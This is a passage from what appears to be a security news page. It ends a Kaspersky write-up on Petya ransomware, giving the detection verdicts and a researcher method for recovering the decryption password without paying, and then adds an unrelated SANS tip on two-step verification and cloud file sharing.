Kaspersky Lab’s products protect users from this threat: Petya’s executable files are detected with the verdict Trojan-Ransom.Win32.Petr; in addition, the behavior analyzer proactively detects even unknown versions of this Trojan with the verdict PDM:Trojan.Win32.Generic.

P.S. How to decrypt your data without paying the ransom

On April 8, some independent researchers reported that they had found a method of restoring the password without paying the ransom to the cybercriminals. The method is based on a genetic algorithm; with the 8-byte long IV (stored in configuration sector 54) and the content of the encrypted verification sector 55, you can calculate the value of the password that generates the salsa key, which can then be used to decrypt the MFT.

Cloud Security

SANS Tip of the Day - Wed, 05/04/2016 - 01:00
One of the most effective steps you can take to protect your cloud account is to make sure you are using two-step verification. In addition, always be sure you know exactly whom you are sharing files with. It is very easy to accidentally share your files with the entire Internet when you think you are only sharing them with specific individuals.